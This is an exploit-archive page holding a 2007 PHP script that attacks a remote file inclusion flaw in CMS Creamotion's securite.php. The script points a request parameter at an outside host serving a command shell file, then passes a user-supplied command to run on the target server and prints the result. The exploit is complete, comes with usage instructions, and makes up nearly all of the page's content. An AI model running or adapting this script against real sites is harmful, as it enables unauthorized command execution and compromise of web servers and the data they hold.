exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cmscream-rfi.txt

cmscream-rfi.txt
Posted Oct 8, 2007
Authored by HACKERS PAL | Site soqor.net

CMS Creamotion suffers from a remote file inclusion vulnerability in securite.php.

tags | exploit, remote, php, code execution, file inclusion
SHA-256 | 2ae3405544bc30f03c774fbf07c1563e9be4f0d9c005bd0da45d727045eefc9b

cmscream-rfi.txt

Change Mirror Download
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CMS Creamotion - Remote File include
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/* CMS Creamotion Command Execution */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<3) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host
/* Example: */
/* php '.$argv[0].' http://localhost/ id
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);

$url=$argv[1];
$cmd=$argv[2];
$exploit="/_administration/securite.php?cfg[document_uri]=http://members.lycos.co.uk/soqor10/cmd.txt?";
$page=$url.$exploit;

Function get_page($url)
{

if(function_exists("file_get_contents"))
{

$contents = file_get_contents($url);
}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}


}
return $contents;
}
$npage = get_page($page);


if(eregi("Cannot execute a blank command",$npage))
{
$pagecmd=$page."&cmd=$cmd";
Die("\n[+] Exploit Is Working\n[+] Result For CMD : ".get_page($pagecmd)."\n[+] See The Vulnerabiliy article for more informations\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}
Else
{
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}
#WwW.SoQoR.NeT
?>
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close